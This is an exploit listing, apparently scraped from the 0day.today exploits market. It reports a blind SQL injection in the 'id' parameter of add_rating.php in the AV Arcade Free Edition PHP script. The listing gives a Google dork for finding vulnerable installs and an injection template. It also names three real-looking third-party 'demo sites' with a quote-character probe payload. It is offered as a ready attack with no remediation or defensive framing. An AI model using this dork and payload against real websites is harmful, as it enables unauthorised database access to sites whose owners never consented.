[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

AV Arcade Free Edition Blind SQL Injection Vulnerability

Author
DaOne
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-19301
Category
web applications
Date add
01-09-2012
Platform
php
##########################################
[~] Exploit Title: AV Arcade Free Edition Blind SQL Injection
[~] Date: 31/08/2012
[~] Author: DaOne  (@LibyanCA)
[~] Software Link: http://www.avscripts.net/avarcade/freearcadescript/
[~] Google Dork: intext:"Powered by AV Arcade Free Edition"
##########################################


[#] [ Exploit ]

http://localhost/content/add_rating.php?id=[Blind SQL Injection]


[#] [ Demo Sites ]

http://fullscreengames.com/content/add_rating.php?id=1'
http://onlinega.me/content/add_rating.php?id=1'
http://www.kingdomtowerdefense.com/content/add_rating.php?id=1'


##########################################
[*] thanks to : All LibyanCA Members (^_^)
##########################################



#  0day.today [2024-12-27]  #